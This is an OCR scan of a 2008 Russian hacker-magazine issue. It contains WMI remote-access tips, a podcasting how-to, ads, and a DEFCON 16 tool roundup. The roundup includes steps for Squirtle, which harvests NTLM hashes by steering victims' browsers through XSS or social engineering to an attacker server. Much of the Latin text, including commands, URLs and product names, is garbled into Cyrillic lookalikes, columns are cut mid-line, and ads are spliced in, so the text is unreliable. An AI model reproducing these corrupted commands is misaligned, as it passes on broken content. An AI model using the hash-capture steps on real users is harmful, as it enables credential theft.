«Безопасность СОМ». Предполагается, что в «Правах доступа» 
разрешен «Анонимный вход». Другой неотъемлемый фактор 
— разрешения на удаленный запуски активацию. Кроме группы 
администраторов, которой они разрешены по умолчанию, права 
должны быть делегированы кому-нибудь еще. Главное тут не 
выдать подобные привилегии группе «Все». :) 

2; Консоль управления ММС содержит всем известную вкладку 
«Управление Компьютером» (иногда ее требуется добавить из 
«Консоль -Э Добавить или удалить оснастку»), в которой есть 
отдельная оснастка «Службы и приложения». Особый интерес в 
ней представляет раздел «Управляющий элемент ѴѴМІ». Выведи 
его свойства и найди вкладку «Безопасность»: в списке должны 
быть отражены один или несколько пространств имен. Так вот, 
для каждого из них можно задать свои правила доступа. Если тебе 
требуется удаленные вызовы, то на нужной группе, отличной от 
администраторов, надо пририсовать права «Включить удаленно». 
Это могут быть группы «Все», «Ыеіѵѵогк Зегѵісе» или созданные 
вручную администратором. 

3) В некоторых случаях ѴѴМІ оказывается недоступен из-за запрета 
удаленного доступа встроенным файрволом ѴѴіпсІоѵѵз. Проблему 
решает одна-единственная команда: 

пеізіі Ягеѵѵаіі зеі зегѵісе КетоіеАсІтіп епаЫе 

4) Предположим, ты написал сценарий и пытаешься запустить 
его, но вдруг тебя обламывает система и выдает ошибку: «ѴѴіпсІоѵѵз 
Зспрйп^ Нозі ассезз із бізаЫесІ оп іЫз тазЫпе». Переведи это и 
смирись. Похоже, администратор отключил ѴѴ5Н, чуть поковыряв- 
шись в реестре: НКЕУ_ШСАІ_МАСНІКЕ\ЗОРТѴѴАКЕ\МісгозоЙ\ 
ѴѴіпсІоѵѵз 5сгірШо5і\5етп§5\ (1 — включить, 0 — догадайся). 



ХАКЕР 10 /118/ 08 



► 033 





МИНЗПРАВСОЦРАЗВИТИЯ РОССИ 



о: 

"М 



ОР 



ЕЖДАЕТ: 



РЕНИЕ 



о: 

■ Н 



ИТ ВАШЕМУ ЗДОРОВЬЮ 






КОМПАКТНАЯ, КАК МОБИЛЬНЫЙ ТЕЛЕФОН, НО... И ЭТО НЕ ОН! 




Реклама. 





АРТЕМ РОСНОВСКИЙ 



ПРАК 



«Подкастинг — процесс создания и распространения звуковых или видео^ * 
передач (то есть, подкастов) во Всемирной Сети (обычно в формате МРЗ для 
звуковых и РІазЬ для видео-передач). Как правило, подкасты имеют опре- \ 
деленную тематику и периодичность издания (однако бывают и исключе- 
ния)» — ѴѴІкіресІіа. 



КАСТ 



МАСТЕР-КЛАСС ОТ ОДНОГО ИЗ ИЗВЕСТНЕЙШИХ ПОДКАСТЕРОВ РУНЕТА 




АРТЕМ РОСНОВСКИЙ - ре- 
дактор утреннего шоу на радио 
«Маяк», ведущий программы 
«Деньги любят», ранее — ди- 
джей радиостанции «Хит-РМ». 
Автор и ведущий популярных 
подкастов, в частности, подкаста 
газеты «Ведомости» и издатель- 
ства «Манн, Иванов и Фербер». 



Уже найдется не так много постоянных жителей Сети, которые бы ни 
разу не слышали слово «подкаст». Его все чаще можно встретить 
на самых популярных сайтах рядом с аббревиатурами П55 и РЭА. В 
действительности, подкаст — не что иное, как еще один способ «чи- 
тать» полюбившийся блог или сайт. Когда-то единственным способом 
получить обновление сайта было — посетить его (с ума сойти, а п ро- 
гъ л о-то всего лет 1 5!). Потом появились почтовые рассылки; в дороге 
можно было посмотреть ѵѵар-версию сайта (были когда-то телефоны, 
которые кроме 5М5 и звонков умели еще и ѴѴАР — дико круто было]. 

С повсеместным внедрением Р55 стало возможным получатьтолько 
новые статьи с сотен сайтов сразу в П55-аггрегаторы (программы или 
сервисы для чтения лент Р55]. Это существенно облегчило жизнь 
тем, чьи интересы не ограничиваются сайтом хакер.ги . и тем, кто сле- 
дит за новостями и посещает десятки сайтов каждый день. Развитие 
технологии позволило внедрять в обычные обновления Р55 разные 
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вложения, например, звук, видео, документы, фотографии и всякое 
такое. Было бы глупо не воспользоваться такими возможностями, что, 
разумеется, тут же и было сделано. Инженеры из Арріе подумали и ре- 
шили, что было бы круто, если бы люди могли получать на свои іРосГы 
радиопередачи из интернета. Сказано — сделано. В іТипез добавили 
источник«Подкасты», его жедобавили в іРоб, написали специфика- 
цию, и началась эра подкастинга. Ну, это если коротко. 

г ПОЧЕМУ ПОДКАСТЫ? 

На самом деле, подкасты — это в некотором плане эволюция бло- 
гов. Просто кому-то удобнее читать, кому-то — слушать. Или, если 
посмотреть с другой стороны, кто-то лучше пишет, а кто-то — лучше 
говорит. Ну и, конечно, многие в детстве мечтали работать на радио 

— а подкастинг как раз дает возможность почувствовать себя радио- 
ведущим. Впрочем, лирику в сторону. Чем же подкаст лучше текста? 
Какие преимущества он дает как автору, так и слушателю? 

Во-первых, подкаст можно слушать в метро, в машине, на пробежке 

— где угодно. А читать блог — только там, где есть интернет. То есть, 
подкастинг позволяет сделать блог доступным в оффлайне. Во-вто- 
рых, ни один, даже самый красочный, текст никогда точно не передаст 
интонации автора. Текст — это «многобукв», которые каждый читает 
по-своему. Живая речь — это экспрессия, здесь и задумчивость в 
голосе, и грусть, и радость (не смайликами едиными], и т.д. Текстом 
этого передать нельзя; лучше один разуслышать историю, чем сто раз 
ее прочитать. Наконец, твой подкаст — это твое персональное радио. 
Делай его, как хочешь, делай, что хочешь! 

Н ПРОСТЫЕ ПРИГОТОВЛЕНИЯ 

Что, собственно, нужно, чтобы начать выпускать подкаст? Один 
единственный мпЗ-файл с твоим приветствием, выложенный у тебя 
на сайте, строго говоря, подкастом не является. Прежде чем засесть 
за микрофон, нужно кое-что приготовить. 

Для начала зарегистрируйся на одном из российских подкаст-тер- 
миналов. Выбор, прямо скажу, не велик. Риззіап Росісазііпд [ гроб. 
ги ] — старейший и крупнейший, но давненько не обновлялся; РосіРМ 
( росТт.ги ] — молодой и довольно продвинутый, но пока не слишком 
популярный; Рамблер-Аудио ( аисІіо.гаппЫег.ги/изегз/ ] — попсовый 
и малопонятный. Есть возможность публиковать подкасты и в Іі.ги . и 
в «Моем Мире» на таіі.ги . и кое-где еще, но подкасты для этих сер- 
висов — продукт побочный, внимания ему уделяется мало. В итоге, 
подкаст-часть реализована из рук вон плохо. 

В общем, на первом этапе регистрации на подкаст-терминале более 
чем достаточно. Придумай звучное название, которое будет макси- 
мально описывать то, о чем ты собираешься говорить. «Мегаподкаст 



Егора Шершневецкого» — название, без 
вопросов, крутое, но слушатель его вряд ли 
запомнит, да и в списке «мегаподкастов от ...» 
он окажется номером 100. Можно попробо- 
вать придумать название странное или прос- 
то необычное. Именно таким путем пошел я, 
когда пару лет назад запускал свой подкаст 
— «Розпоѵзку Рагк™ ѴѴеекІу» [ гозпоѵзкѵ.ги ]. 
Многие проследили аналогию с Парком Горь- 
кого (Культуры и Отдыха], который по-англий- 
ски называется Оогку Рагк. Ведь в подкасте я 
в меру сил развлекаю аудиторию, рассказы- 
вая истории из своей бурной радио-жизни. 

В общем, постарайся с названием. К нему, 
кстати, понадобится обложка. Обложка (со- 
гласно спецификациям Арріе] — это картинка 
размером отЗООхЗОО до 600x600 точек. Что 
ты на эту картинку поместишь — решать тебе, 
но имей в виду: она будет отображаться на 
айподах и некоторых других плеерах во время 
прослушивания; помимо этого, она будет 
сопровождатьтвой подкаст на подкаст-терминалах. Можно, конечно, 
использовать собственную фотографию или нарисовать какую-ни- 
будь фигулину в Ра іпі, но лучше попросить приятеля -дизайнера (в 
жизни не поверю, что у тебя такого нет] потратить пять минут времени 
и за бутылку хорошего... ну, чая, например, с печеньем сделать тебе 
красивую и «говорящую» картинку. На этом первый этап приготовле- 
ний можно считать законченным. 

г ПЕРВАЯ ЗАПИСЬ 

Второй этап — подготовить мысли к изложению. Если ты планируешь 
делать что-то большее, чем зачитывать записи из своего блога, то 
настоятельно рекомендую держать перед глазами списоктем, кото- 
рые ты собираешься освещать в ближайшем выпуске подкаста. Такой 
список называется шоунотами (збоѵѵ-поіюз, «заметки к шоу»] и обыч- 
но публикуется с каждым выпуском подкаста. Кактолькоты придумал, 
о чем будешь рассказывать, и записал это богатство в нескольких 
строчках, можно приступать кзаписи. 

С чего начать? Начатье микрофона! Без него подкаст сделать будет слож- 
но. В принципе, подойдети мобильнике диктофоном, но этот вариант 
не лучший. Благо, микрофонов много, хороших и разных. Практически в 
каждый современный ноут встроен микрофон. В компьютерном магазине 
можно найти с десяток моделей микрофонов. Какой же выбрать? Отвечу 
так: для первых выпусков — любой. Встроенные, пожалуй, это наихудший 
вариант, каки пластмассовые«микрофоны»за 100 рублей. Но для «поп- 
робовать» сойдут и они. Если втянешься, всегда можно купить аппаратуру 
покруче... а вот если подкастингутебя не пойдет, продавать уже куплен- 
ную дорогую аппаратуру может быть довольно обидно и накладно. 
Похожая история и с софтом для звукозаписи. Программ существует 
сумасшедшее количество, на любой вкус и кошелек. Но для нача- 
ла разумно попробовать одну из бесплатных программ, например 
Аисіасііу ( аисіасііѵ.зоигсеіогде.пеі ]. Никаких сверхвозможностей она 
не дает, но с задачей записи и редактирования голоса справляется 
вполне достойно. 

Итак, у нас есть компьютер, микрофон, программа для звукозаписи. 
Можно приступать. Будь готов ктому, что в этот моменттебе может 
показаться: ничего не получится! Действительно, разговаривать с 
микрофоном психологически не очень-то просто. Если ты включил 
запись, но говорить не получается (или получается плохо] — не страш- 
но. Советую попробовать несколько путей. Первый — пригласить в 
гости приятеля; или — позвонить ему по 5куре ( ѵѵѵѵѵѵ.з куре .сот ]. Тебе 
надо поговоритьс ним натемытвоего подкаста. А отключившись от 
разговора — попробовать повторить все в микрофон уже без собесед- 
ника. Вообще, собеседник — сильный момент при записи подкаста. 
Поэтому гораздо лучше пригласить человека в гости и вместе с ним 
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> іггіо 

• Если в подкасте 
участвует несколько 
человек, то шоу- 
ноты нужно как-то 
«расшарить» для 
всех. Идеально для 
этих целей подходят 
Ооодіе Эосз и 
боодіе ІЧоіеЬоок. 
Крометого, можно 
завести на сіеі.ісіо. 
из специальный 
тег и помечать им 
ссылки, которые 
могут пригодиться 
во время записи. 



І обавляем в подкаст фоновый трек 

[ 



• Записывать 
подкаст вдвоем 
довольно просто. 
Созвонитесь по 
Скайпу и запустите 
запись каждый на 
своем компьюте- 
ре. В итоге, сведя 
воедино отдельные 
файлы с голосом 
каждого участника, 
получишь группо- 
вой подкаст. 

• Меня часто 
спрашивают, какие 
подкасты слушаю я. 
Вот ответ: 

• Радио-Т ( гасііо- 
Ссот ) — главный 
ЬКесб-подкаст. 

• ТЬізѴѴеекіп ТесЬ 
[ іѵуісЫ — популяр- 
ное обсуждение 
хайтек-событий 
недели. 

• Расііо бгіпсЬ 
[ гасІіодгіпсЬ.ги ] — 
отличный и очень 
разный подкаст. 

• Подкаст от 
Іітриіип ( итриіип. 
сот ) — лытдыбр 
нашего бывшего 
соотечественника. 

• Подкастеры в 
городе ( СіЕ/СазЕ 
Ьу] — подкаст наших 
белорусских друзей. 



записать выпуск. Если такой возможности нет (например, 
утебя нет друзей :)), то можно использовать ѵѵеЬ-камеру 
или зеркало. Наверное, тебя это удивит, но беседоватьсо 
своим отражением в зеркале — увлекательное занятие, 
особенно, если не соглашаться, ругаться и спорить. Глав- 
ное, чтобы до драки не дошло. 

Н 10 ПРАВИЛ ХОРОШЕЙ ЗАПИСИ 

Перечислю их: 

1. Говори так, будто рассказываешь историю в хорошей 
компании. 

2. Не читай по бумажке. 

3. Не останавливай запись, если запнулся или огово- 
рился — либо оставь как есть, либо сразу переговори 
неудавшийся момент. 

4. Говори только отом, что тебе интересно. Если тебе не 
интересна тема твоего подкаста — она не будет интересна 
никому! 

5. Не забывай, что слушают тебя самые разные люди, 
проявляй к ним должное уважение. 

6. Если непечатные выражения —твой родной язык, будь 
готов ктому, что и слушатьтебя будут одни гопники. 

7. Если к концу записи ты можешь сделать анонс следу- 
ющего выпуска — обязательно сделай! Если слушатели 
будутзнать, о чем пойдет речь в следующий раз, то с 
большей вероятностью послушают новый выпуск. 

8. Следи за словами-паразитами. Это самый сложный 
совет. Обычно всякие «вот», «так», «типа» и прочие заме- 
чаешь уже после записи. 

9. Если во время записи вокруг слишком шумно — отложи 
запись. Мало кому будет приятно вслушиваться, что там 
такое бубнят. 

10. Если какое-то правило из этих 1 0 не нравится — забей 
на него! Может быть, именноты откроешь новую эру в 
подкастинге? :) 

Н ОБРАБАТЫВАЕМ ЗВУК 

Представим, что свой голосты записал, наговорил 
много интересного, и теперь хочешь сделать из этого 
подкаст. Хорошим тоном считается убрать из речи все 



лишнее. Если ты запинался и переговаривал какие-то 
места — подчисти запись. Если заметил слова-парази- 
ты, и у тебя получается их удалить — конечно, удаляй! 
Ахи, вздохи, мычание, хрипы и всхлипы тоже можно 
смело вырезать, если они, конечно, не являются частью 
твоего художественного замысла (бывает и такое). Под- 
чищенную речь нужно нормализовать (в твоем аудио ре- 
дакторе, наверняка, есть функция «ІЧогтаІіге»). Можно 
слегка подчистить фоновый шум функцией «Оупатіс 
Ехрапбег» или, в крайнем случае, «ІЧоізе Оаіе». У 
обеих этих функций есть параметры, такие, как гаГо, 
ЛзгезЬоШ, аЛак ііте, геіеазе Гте, но я не буду тебе 
говорить, что именно ставить. Не потому что я жадный, 
а потому что все это очень индивидуально. Пробуй, 
двигай бегунки, выставляй разные цифры и слушай, 
что получается. Кактолько понравится результат — это 
и будуттвои личные параметры обработки! Финаль- 
ным моментом должна стать компрессия («Оупатіс 
Сотргеззіоп») — поиграв с настройками, ты можешь 
получить насыщенный и мощный звук, как в твоей 
любимой радиопередаче. Разумеется, премудростей 
звукозаписи — великое... нет, лучше так — ВЕЛИКОЕ 
множество. Подробно узнать, как и что лучше делать, ты 
можешь из подкаста «Теория и практика звукозаписи» 
( іірг.итриіип.сот ). Там же можно найти массу обзоров 
и сравнений разных продвинутых и не очень микрофо- 
нов, звукозаписывающих примочек и всякого такого. 

Мы же пойдем дальше. 

В ОФОРМЛЯЕМ ВЫПУСК 

Попробуем оформить твой первый выпуск. Это, кстати, 
совершенно не обязательно. Вполне можно сразу загру- 
зить на подкаст-терминал голосовой файл — многиетак 
и делают. Но те, кто стремится к совершенству, в той или 
иной степени оформляют свои подкасты. В начало вы- 
пуска можно добавить небольшой джингл (музыкальную 
заставку). Где ее взять — вопрос не простой. Чисто теоре- 
тически, ты можешьзайти на ѵѵѵѵѵѵ.росізаіютизіспеіѵѵогк. 
сот , выбратьлюбую понравившуюся песню и вырезать 
из нее фрагмент, который и станет заставкой. Дальше 



► озб 
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Разведение Интернета 
по электропроводке 



Хотите расширить домашнюю сеть 
м подключаться к Интернету в таких 
уголкам квартиры, где не проложены 
кабели? Беспроводная сеть Ш Гі 
не проходит Сквозь стены? 

Не надо хвататься за перфоратор 
или накручивать мощные антенны. 
Сеть, для которой любые стены не 
преервдэ., уже проложена в вашем 
доме! Это обычная электропроводка, 



которую с помощью Рсіѵѵчзтіі пе 
адаптеров 2уХЕІ_ можно превратить 
в скоростной канал для связи 
дома шннх устройств, 

Каждая электрическая розетка 
в собственном или арендуемом 
помещении становится точкой 
доступа в Интернет ил и локальную 
сеть. Технология НотеНид ДѴ 
обеспечивает скорость до 200 Мбмт/с 



и является единственной реальной 
альтернативой ЕЕЫ?гпеЕ 
кабелю для передачи сигнала 
ІР телевидения и видео Гуіі НО 
о любое место квартиры, где 
установлен телевизор. Разведение 
Интернета по электропроводке 
с помощью адаптере в 2уХЕІ 
не требует настройки « под силу 
даче неспециалистам. 



- 
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можно таким же образом выбрать фоновую музыку. Фоновая музы- 
ка, кстати, момент спорный, многие предпочитают ее не ставить, но 
лучший вариант — попробовать и определиться. Особенно полезна 
музыкальная подложка; если во время записи было шумно — музыка 
скроет многие дефекты плохой записи, проверено. Для сведения 
всего этого богатства воедино (музыкальная заставка + твой голос + 
фоновая музыка] понадобится что-то вроде многодорожечного ре- 
дактора. Тут придется погуглить, поскольку я пользуюсь программой 
багадеВапб от Арріе и не очень разбираюсь в софте под ѴѴіпбоѵѵз. Так 
или иначе, для сведения эпизода подкаста подойдет и уже упомяну- 
тая Аибасйу, хотя назвать ее удачным инструментом для этих целей, 
пожалуй, нельзя. На всякий случай намекну, что твой голосдолжен 
звучать намного громче фоновой музыки, а заставка — не громче 
голоса. 

Как только поймешь, что все готово, возникнет вопрос, в каком 
формате сохранять звуковой файл. Тут все довольно просто. Стан- 
дартом де-факто является трЗ. Есть, конечно, и подкасты в ААС, одд 
и других форматах, но трЗ — основа основ и начало начал. Если у 
тебя не музыкальный подкаст (а если музыкальный — то зачем ты все 
это читал?!], то ориентируйтесь на размер файла. Голос совсем не 
обязательно сохранять в стерео — конвертируй файл в моно. Высокий 



битрейт для голоса совсем не нужен — огран 
дискретизации (только не спрашивай, что эт 
либо 441 00 Н 2 , либо 22050 — это принципиат 
другие значения приведут к некорректному е 
подкаста бІазЬ - плеерами. Кроме того, выстаі 
ты уменьшишь размер файла, что позволит с 
кого б іа 1-и р или платный трафик. Для кон вер 
можно, кстати, использовать ІТипез. В настр 
просто указать все эти параметры, после чег 
твой робсазИ .трЗ и правой кнопкой мыши е 
в трЗ». В общем, в результате у тебя должен 
росісазН.трЗ, топо, 64 кбит/с, 22050 Нг. По 
Чтобы подкаст стал совсем готов, его нужн 
раз для этих целей ты и регистрировался г 
Рассказывать, как загружать туда готовые 

предельно просто. Не забывай добавлять интересные описания к 
выпускам. Потенциальные слушатели сначала читают описание, 
а потом скачивают подкаст или подписываются на него, поэтому 
очень важно привлечь внимание описанием. Кстати, все под- 
каст-терминалы позволяют указывать, содержится ли в подкасте 
ненормативная лексика. Не игнорируйте эту метку; если твой 
подкаст не предназначен для детей младшего школьного возраста 
— так и указывай вописании, это позволит избежать разных 
неприятностей. 

0 КАК СДЕЛАТЬ ПОДКАСТ ПОПУЛЯРНЫМ? 

Да кто ж его знает-то! :] Истории известны случаи, когда подкасты на 
самые, казалось бы, интересные темы так и не становились попу- 
лярными, а совершенно заурядные — наоборот, «выстреливали». 
Угадать заранее, попадешь на вершину славы или нет, практически 
невозможно. Зато вполне можно предпринять некоторые шаги, чтобы 
отвоем подкасте узнали. 

Во-первых, добавь свой подкаст на все подкаст-терминалы. Ведь 
кому-то ближе портал Риззіап Робсазбпд, а кому-то — РобЕМ. Если 
владеешь английским — обязательно добавь свою ленту на все 
западные терминалы ( робсазІаЦеѵ.сот . ѵѵѵѵѵѵ.робсазібігесіогѵ.сопп . 
робсазГсот и другие] — за рубежом живет очень много русскогово- 
рящих людей, которые вполне могут наткнуться на подкаст именно 
таким образом. Если у тебя есть аккаунт в американском ІТипез Зіюге 



Моя 

домашняя студия 

Начиналось все с Зоигкб Рог^е и Ѵе§а$ на работе. Домой я сначала 
купил М-Аікбіо Росісазі; Расгогу (отличный, кстати, вариант до 
$200), в который входил микрофон, внешний аудио-интерфейс, 
диске Аибасігу. От Аибасйу отказался почти сразу — для маков есть 
огромное количество куда лучших и не дорогих аналогов. До сих 
пор для записи использую связку ЗоітсІЗшсІіо + Сага^еВапб. (для 
сведения) . Железную часть обновил недавно: теперь у меня микро- 
фон Актава МК-220 и голосовой процессор сіЬх 286А. Планирую со 
временем добавить микшер и второй микрофон — для записи в 
компании :). 



► 038 
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— обязательно добавь свой гзз и туда: это основной источник под- 
кастов для подавляющего большинства слушателей. Не стесняйся 
проанонсировать свежий выпуск в ЖЖ, твиттере или в блоге — чем 
больше людей узнает о подкасте, тем лучше. Старайся отвечать на 
комментарии и письма, которые будут приходить тебе в ответ на 
подкаст. Если ты будешь отвечать на комментарии в самом подкас- 
те, это даже лучше — со временем вокругтвоего шоу сформируется 
лояльная аудитория. 

И самое главное: твой подкаст — это твое пространство. Тут ты 

царь, бог и премьер-министр. Никого не слушай, делай так, кактебе 
нравится. Ты спросишь, зачем же тогда такая большая статья о том, 
как делать подкаст? Отвечу: это неполный, но самый короткий путь к 
собственному успешному шоу. Ноу каждого шоу свой путь, и не факт, 
что тебе подойдет именно этот. Экспериментируй, играй, получай 
удовольствие! Не за этим литы затевал подкаст? :) ц-ц 





рофпѴ 0 МВД 




Подкаст-терминал робіт появился недавно, ноуже завоевал немало 
поклонников 



Подкаст-терминалы 

По большому счету, в России работают два подкаст- 
ПЮК1ІН терминала. 

Особенность первого во всех смыслах Киззіап 
Робсазііп^ (гроб.ги) в том, что отсюда начинают искать инте- 
ресные подкаст практически все. Здесь много авторов и много 
слушателей, здесь есть рейтинг, директория, сервис статистики для 
подкастеров. Здесь выходят в эфир знаменитые «Сиськи-письки 
шоу» и «Большой подкаст» Василия Стрельникова. Здесь давно 
ничего не обновлялось, но существует местная «тусовка»; хороший 
подкаст, если будет замечен, может быть рекомендован местными 
гуру на главной странице. 

По-своему хорош и РосІРМ (ррбйтьт). Здесь тоже 
есть своеобразный рейтинг, за каждый эпизод 
подкаста можно проголосовать, к выпускам можно добавлять фото- 
графии — это называется слайд-кастами. Хорошие подкасты реко- 
мендует редакция, помечая их специальным бейджиком. Относи- 
тельно мало подкастов пошлых и грубых. Есть сервис статистики 
для подкастеров, но самих подкастеров относительно немного. 
Слушателей тоже маловато, но это вопрос времени — работа над 
терминалом ведется постоянно. 

Из англоязычных хочется выделить сервис от Арріе 
^^1 иОбео. 

іТипез Росісазіз (ѵѵѵѵѵѵ.арріе.сот/ішпе^ — это 
даже не терминал, а директория подкастов. Чтобы 
добавить свой подкаст сюда, нужен аккаунт в аме- 
риканском іТипез Згоге. В общей сложности здесь собрано более 
125000 аудио- и видео-подкастов, есть разделения по категориям и 
популярности. К сожалению, наших подкастов среди популярных 
нет: англоязычные подкасты скачивают сотни тысяч слушателей, 
русскоязычные — в лучшем случае несколько тысяч. Так или иначе, 
это первое место, куда нужно добавлять свой подкаст. 

Гр _ " Т Англоязычная директория номер два — Осіео Гобео. 

сопі) . Это директория и в некотором плане еще и 
терминал: на Обео можно вручную добавлять эпизоды подкаста, 
записывать их онлайн и делать многое многое другое. Размах 
впечатляет: десятки тысяч подкастов и огромная аудитория слуша- 
телей. 
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РЕЛИЗОВ I 
ОЕРСОЫ 16 



САМЫЕ ГРОМКИЕ РЕЛИЗЫ ПРОШЕДШЕЙ ХАКЕРСКОЙ КОНФЕРЕНЦИИ 



Хакерская конференция ОЕЕСОІЧ, проходящая в Вегасе, всегда славилась 
сногсшибательными докладами, освещением жестоких багов и уязвимос- 
тей, и, конечно же, релизами доселе недоступных публике эксплоитов 
и х-тулз. На недавно прошедшей ЭЕЕССЖ 16 таких релизов было особенно 
много. Мы не могли обойти их стороной. 



І'МИ'НІ — это не просто конференция, не просто очередной ивент. 

Это практически святое место для хакеров и кракеров, где они могут 
обнародовать результаты своей многомесячной и многолетней работы. 
Трудно забыть 2001 год, когда на конференции был арестован русский 
программист Дмитрий Скляров за «взлом системы защиты электрон- 



ных документов АбоЬе». В этом году еще перед конференцией был 
обыскан британский специалистпо взлому 05М. Это лишь очередное 
доказательство, что доклады и релизы на конференции всегда самые 
актуальные и свежие. И утебя есть отличная возможность с ними 
познакомиться. 



ВЕНОІШЕК — ВУ ЫЕЬ50Ы МІШІІ.0 АЫй 
ШІ5Е01ІАР00 



пі 

105-СИСТЕМА ДЛЯ БЕСПРОВОДНЫХ 
СЕТЕЙ 

НТТР://ѴѴѴѴѴѴ.ВЕН0І-0ЕРѴѴІРЕІ.Е55.0КѲ 



Внимательные читатели не понаслышкезнакомы с приемом Подие 
АР, когда в беспроводной сети появляется подставная точка доступа. У 
нее похожий идентификатор 55Ю. Она обладает большим сигналом и с 
радостью принимает соединения от ничего не подозревающих пользо- 
вателей, снифает весь проходящий трафик, отлавливая пароли, кукисы и 
прочие ценные данные. 

Представленная на ОЕРСОІМ’етулза — ВебоШег — нацелена какраз 
нато, чтобы подобные зловредные действия в эфире ѴѴі-Рі пресечь. В 



общем-то, много для этого и не надо: достаточно отслеживать изменения 
Е55Ю, МАО, используемых каналов для «родных» сетей и битьтревогу 
в случае, если обнаружены подозрительные сети. Если точка доступа 
родного хотспота в соседней кофейне или универе всегда использовала 
14й канал, а тутон вдруг поменялся — стало быть, нужно призадуматься. 
Подозрения вызываюти внезапные изменения других параметров. 
Разработчики ВебоШег пошли дальше и разработали целую мето- 
дику, позволяющие обнаружить присутствие в сети популярныхтулз, 
реализующих атаку Родие АР, втом числе кагта и боІроМег. Многие из 
нихнамеренно коверкают Е55Ю легитимной точки доступа, изменяя не- 
сколько символов. Ну, например, имя Іпіозес превращаютв ІпШзес — а 
наивный пользователь к ней подключается. ВебоШег легко определяет 
появление в сети устройств с исковерканным Е55Ю, используя систему 
привычных регулярных выражений. 



► 040 
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Запускаем ВеЬоШегдля поиска сетей с похожим Е55Ю 







Интерфейс Огепсіеідля МАО 



Программа написана для линукса и запускается на любой системе с яд- 
ром 2.6.x. Чтобы отследить появлениеточекс левым идентификатором, 
потребуется команда запуска: 

ЪеБюІсіег -г " . * [ 1 і ] пН [Оо] з [Зе] с . * " 



Подобному указанию будут соответствовать названия «Оіпіозес», 
«іпШзес», «1 пбогес- 1 » — и т.д. 




ОІРЕК 



ВТОМАТИЧЕСКОЕ СРЕДСТВО ДЛЯ 
ЕСТИРОВАНИЯ ѴОІР-П РИЛ ОЖЕНИ Й И 
ПРОТОКОЛОВ 



НТТР://Ѵ0ІРЕР.501)РСЕР0Р6Е.ЫЕТ 



Помимо беспроводных сетей, специалистов по безопасности сейчас 
сильно заботит ѴоІР. Еще бы! Кругом идет внедрение ІР-телефонии, 
всюду огромное количество протоколов и конкретных их реализаций. 
Неудивительно, что телефонный трафиклегко перехватить, а при 
желании провести спуфинги, к примеру, подделать СаІІегЮ (что мы и 
демонстрировали в статье «Телефонные шалости»]. ѴоІРЕР — это це- 
лый наборутилит, позволяющий легко (и автоматически] тестировать 
ѴоІР-устройства на наличие известныхуязвимостей. В основе лежит 
известный фреймфоркЗиІТеу биггіпд , а также 5ІР-движокІоііигег 
вкупе с большим количеством разных модулей. Благодаря этому, раз- 
работчикам удалось собрать утилиту для разных платформ, включая 
Бі п их, 05 X и даже 0111 -в ый вариант для ѴѴіпбоѵѵз. В арсенале ѴоІРЕР 
— больше 200.000 тысяч различных тестов для проверки правильности 
реализации 5ІР-протокола. В скором времени разработчики обещают 
модули для работы с Н.323/ІАХ. 




50ШРТІ.Е 



ТУЛКИТДЛЯ ПЕРЕХВАТА ЬМ/ЫТЬМ 
НА5Н ЧЕРЕЗ ѴѴЕВ 



НТТР://СООЕ. 60061-Е. С0М/Р/5СІШКТІ-Е 



Что такое 1\1ТБМ? І\ІТ БАІ\І Мападег — это давно существующий протокол 
сетевой аутентификации, разработанный МісгозоБдля сетей ѴѴіпбоѵѵз 
І\ІТ. Судьбе паролей, хранимых в ОС семейства ѴѴіпбоѵѵз, не позавидуешь 
— даже самые стойкие и красивые из них обречены на провал. Виной 
всемутяжелое наследие... угадай кого? Правильно, протокола ЫТБМ, 
будьон неладен! Сами хешиуже давно не надо взламывать. Из-за 
особенностей протокола нам известны атаки типа «разз-Ше-Ьазб» и 
множество утилит, эти атаки реализующих. В итоге мы получаем нужные 
права на сервере или рабочей станции, дамп хешей и т.п. Провернуть 
атаку позволяют, например, Нубга, РаззТЬе НазЬ ТооІкіБ Сапѵаз, СОВЕ 



ІтрасБ тот же самый МеіазрІоіБ На конференции С Ьаоз СопзБисбопз 
наш автор Іюха представил утилиту, которая доводитлегкость выполне- 
ния РбН-атакдо маразма «большой красной кнопки». Только этотхеш 
нужно как-то перехватить! 

Ранее можно было использовать БОБиппр, РѴѴОитрХ, любимый Саіп 
& АЫе, нотеперь, с релизом Зциігие, протокол ЫТБМ придется оконча- 
тельно похоронить. Заполучить чужой хеш стало возможным даже через 
ѴѴеЬ. Винойтому — зоны доверия, реализованные в Іпіегпеі: Ехріогег. 
Все внутренние серверы автоматически попадают в зону доверия. А это 
значит, что ІЕ будет оправлять данные ЫТБМ прямо в своем запросе. 
Банальной Х55 или социальной инженерией взломщики могут получать 
хеши пачками! Достаточно установить виндовую утилиту 5ц и ігБе и 
запустить ее. Это предельно просто: 

ЩИзменяем настройки в файле зсзиігБІе .уаші. 

^Запускаем интепретатор ВиЬу: гиЬу здиігБІе . гЪ. 

^Отправляем браузеры на БШСр : / /уоигзегѵег : 8080. 

ѴѴіпбоѵѵз Ѵізіа по умолчанию отдает только І\ІТБМѵ2-хеш (защищенный 
оттакихатак], но разве хоть одна крупная компания (помимо, возможно 
самой МісгозоіЧ] уже полностью перешла на Ѵізіа? Ате, кто перешли, 
часто чутьли первым делом включают поддержку ЫТБМ! 



□ РА0І5 — ВѴ .ЮНЫ РІТ2РАТРІСК 



УТИЛИТА ДЛЯ СОВМЕСТНОГО 
ИСПОЛЬЗОВАНИЯ ИНФОРМАЦИИ 
В ХОДЕ ТЕСТА НА ПРОНИКНОВЕНИЕ 
НТТР ://й РАО 15. 5011 ВСЕГО ВОЕ. ЫЕТ 



В инете, как на дрожжах, появляются онлайн-сервисы для совмест- 
ной работы: одновременного редактирования документов, работы с 
исходниками и т.п. А чем хуже пен-тестеры? В самом деле, достойных 
средств совместной работы у специалистов по безопасности сучетом 
специфики их работы почему-то не было. Пора это исправить! Две 
утилиты, представленные на БЕРССИМ 1 6, относятся как раз к разряду 
соІаЬогабоп. Бгабіз — клиент-серверная платформа для удобного 
обмена информацией в ходе взлома. Когда целая команда занимается 
одним проектом, будет очень кстати иметь под рукой базу с информа- 
цией об уже проделанной работе. Хотя бы для того, чтоб не повторять 
неудачных попыток. 

Важно, что часть информации попадаетв базу Огасііз автоматически — 
не нужно копипастить в базу все логи, инфу с консоли и т.д. В последней 
версии была также реализована поддержка 55Б: Огасііз, какминимум, 
можно использовать в качестве платформы для безопасного общения! 
Проект полностью написан на ВиЬу, поэтому изначально является 
кроссплатформенным, а для установки под Виндой собран специальный 
инсталлятор. 



ХАКЕР 10 /118/ 08 



► 041 









^ рс_гопе 




Бейдж участника БЕРСОИ 16 со встроенным 
чипом 




